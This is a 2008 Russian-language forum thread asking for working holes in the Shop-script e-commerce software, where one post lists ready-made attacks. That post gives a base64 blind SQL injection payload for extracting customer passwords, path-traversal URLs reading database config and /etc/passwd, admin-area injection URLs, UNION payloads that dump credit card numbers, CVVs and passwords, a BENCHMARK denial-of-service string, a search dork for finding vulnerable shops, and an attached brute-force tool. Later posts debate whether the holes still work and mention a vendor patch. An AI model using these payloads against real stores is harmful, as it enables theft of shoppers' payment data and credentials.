взлом SS

Тема в разделе "Shop-script", создана пользователем daniloff, 28 июл 2008.

Статус темы:
Закрыта.
  1. daniloff

    daniloff Постоялец

    Регистр.:
    31 май 2008
    Сообщения:
    78
    Симпатии:
    3
    Кто знает рабочие дыры в SS v 1.24?
     
  2. FLINT

    FLINT А пофлудить?о_О

    Регистр.:
    23 июл 2007
    Сообщения:
    429
    Симпатии:
    176
    гы.
    Хороший прикол...
    ты сам ответь а вопрос - если бы ты знал дыру в ШС ты бы выложил ее на форуме?
    Ты бы сидел и потихонечку сливал информацию.
    Дыры есть но их искать нужно.
    Мой тебе совет - бери и ищи. никто тебе не выложит ничего на блюдечке.
    Самое дорогое у нас сейчас - информация(БД товаров, БД покупателей и т.п.). так что думай сам
     
    IRIDON, alexander-x и Zlobniy Babko нравится это.
  3. Hmelex

    Hmelex

    Регистр.:
    15 апр 2008
    Сообщения:
    514
    Симпатии:
    119
    Вот наконец то решила отписаться в этой теме про дыры.

    Ползая по инету небрела на разные (правдо старые) методы взлова и кражи полезной (секретной) информации.:ah:

    SQL injection

    уязвимый скрипт invoice_phys.php
    уязвимый парамерт order_time=
    данные передаются кодированные в base64; возможен только посимвольный перебор
    Пример уязвимого куска кода:
    PHP код:
    $_GET["orderID"] = (int) $_GET["orderID"];
    $sql = 'SELECT COUNT(*) FROM '.ORDERS_TABLE.'
    WHERE orderID='.$_GET["orderID"].' AND
    order_time="'.base64_decode($_GET["order_time"]).'" AND
    customer_email="'.base64_decode($_GET["customer_email"]).'"';

    Пример:
    Код:
    2008-03-16 14:24:11" or 1=1/*

    Рабочий "код":
    Код:
    2008-03-16 14:24:11" or orderID=1 and ascii(substring((select cust_password from SS_customers where customerID=1),1,1))=97/*

    который нужно прогнать через base64_encode и передать скрипту.
    Для удачного перебора нужно знать № существующего заказа в базе. Пароль в базе лежит перекодированный в base64, так что в открытом виде

    Поиск: __http://search.icq.com/search/results.php?q=inurl%3A%22index.php%3Ffeedback%3Dye s%22
    Приблизительно 1500 стр...
    Где то стянула скрипт я его прикрепила.
    Я правда сама неразобралась - может кто то в этом силен???? пароль на архив: hmelex:ah:

    Уязвимый скрипт с параметром:
    имя сайта/index.php?aux_page=../cfg/connect.inc.php
    В исходнике страницы выводит настройки подключения к mysql (правда срабатывает на старых 1-х версиях), но идея интересная.


    Exploit:

    Код:
    http://site.com/Script/index.php?aux_page=../../../../../etc/passwd (у меня несрабатывал)



    1. SQL-injection в зоне администрирования
    - http://www.demo.shop-script.ru/prem...t&customer_details=order_history&customerID=1[SQL]
    - http://demo.shop-script.ru/premium/admin.php?dpt=conf&sub=setting&settings_groupID=-2[SQL]
    - http://demo.shop-script.ru/premium/...b=new_orders&orders_detailed=yes&orderID=-107[SQL]
    - http://shop/index.php?productID=75&discuss=true&remove_topic=-14[SQL]
    - http://demo.shop-script.ru/premium/admin.php?dpt=catalog&sub=discuss&productID=1114&answer=-9[SQL]
    - http://demo.shop-script.ru/premium/admin.php?dpt=catalog&sub=iscuss&productID=-1114[SQL]
    - http://demo.shop-script.ru/premium/admin.php?dpt=reports&sub=product_report&categoryID=-82[SQL]
    - http://demo.shop-script.ru/premium/admin.php?dpt=conf&sub=zones&countryID=-1[SQL]
    - http://demo.shop-script.ru/pro/admin.php?dpt=conf&sub=zones&countryID=-1[SQL]

    Exploit:
    - http://www.demo.shop-script.ru/prem...ct+DATABASE(),null,null,null,null,null,null/*
    - http://www.demo.shop-script.ru/prem...select+USER(),null,null,null,null,null,null/*
    - http://www.demo.shop-script.ru/prem...ect+VERSION(),null,null,null,null,null,null/*
    - http://demo.shop-script.ru/premium/...ber,cc_holdername,cc_expires,cc_cvv,null,null,
    null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
    - http://demo.shop-script.ru/premium/...,cust_password,null,null,null,null,null+from+
    SS_customers/*&sort=customers_rating&sort_dir=ASC

    DDoS:
    - http://shop/pro/admin.php?dpt=conf&...(10000000,BENCHMARK(10000000,md5(current_date)))

    2. Раскрытие установочного пути
    - http://shop/admin.php?dpt=modules&sub=shipping&setting_up=2'
    HTTP-запрос:
    GET http://demo.shop-script.ru/premium/index.php?answer=1&show_price=yes&save_voting_results=yes HTTP/1.0
    Accept: */*
    Referer: http://demo.shop-script.ru/premium/index.php?show_price=yes
    Accept-Language: ru
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: demo.shop-script.ru
    Cookie: PHPSESSID=9b93a5c8a536267b43a19262a1819c30'




    Может и это кому то поможет - было бы хорошо еслибы кто то подсказал как сделать могазин более безопасным для заказчика с точки зрения финансов.

    И напоследок проверьте прикреплённый файл. Уж больно там интересно всё написано......:ah:
     

    Вложения:

    • SS_brute.zip
      Размер файла:
      2,3 КБ
      Просмотров:
      42
  4. IRIDON

    IRIDON

    Регистр.:
    3 авг 2008
    Сообщения:
    227
    Симпатии:
    12
    SQL инэкцыи версия ПРО и премиум не потдаеться, такое было замечено только в фри веерсии, уж больно это распространенный тип взлома, про это написано на сайте разработчиков что мол все защищено, это так и есть, читал результаты работы хакеров над этим скриптом, SQL инэкцыя ничего не дала и внедрение кода тоже. Но дыры есть во всем, вопрос стоит только кто будет ломать и сколько времини на это у него уйдет, и в какую цену обойдеться взлом заказчику.
     
  5. biznesoft

    biznesoft

    Регистр.:
    11 фев 2008
    Сообщения:
    510
    Симпатии:
    128
    Взломать можно все, ето факт.
    Зачем кому-то ломать чужой шоп, разве:
    1).полный отморозок вам завидует и хочет что-то намутить, но если чувак дау... то он с технической точки зрения не будет знать как это можно сделать.
    2). У вас на шопе установлено уникальный и красивый диз.. шаба -- смыслу ламать если это можно фактически сделать без взлому шопа. (украсть шаблон).
    Чтобы взламати шоп на заказ, думаю это не малых денег стоит, для чего такие расходы, лучше все с 0 сделать, если вы хотите подобный шоп.
    Вывод: умный админ своего шопа знает каким образом защититься от подобного.
     
  6. mytrance

    mytrance

    Регистр.:
    15 дек 2007
    Сообщения:
    347
    Симпатии:
    120
    А это тогда что?
    http://blog.webasyst.ru/sspro-premium-sql-ing-aug08/
     
  7. IRIDON

    IRIDON

    Регистр.:
    3 авг 2008
    Сообщения:
    227
    Симпатии:
    12
    Я сказал основными приемами.
     
  8. Dmytro_ua

    Dmytro_ua

    Регистр.:
    15 фев 2008
    Сообщения:
    239
    Симпатии:
    21
    Это естественно для лицензии, да еще и по запросу в тех поддержку... достать бы файлики, да занулить бы :-]
     
  9. biznesoft

    biznesoft

    Регистр.:
    11 фев 2008
    Сообщения:
    510
    Симпатии:
    128
    Ничего нулить не нужно, в тех файлах все ок.
    На форуме поднималась данная тема и файлы выкладывали, поиском воспользуйся :)
     
    Dmytro_ua нравится это.
  10. fominsa

    fominsa

    Регистр.:
    12 фев 2008
    Сообщения:
    234
    Симпатии:
    229
    Взламать шоп премиум можно было еще 1,5 месяца назад уязвимость нашел я. сейчас артикус уже выпустила заплатку на официальном сайте я слышал что есть данная заплатка
     
    Phoenix_666 нравится это.
Статус темы:
Закрыта.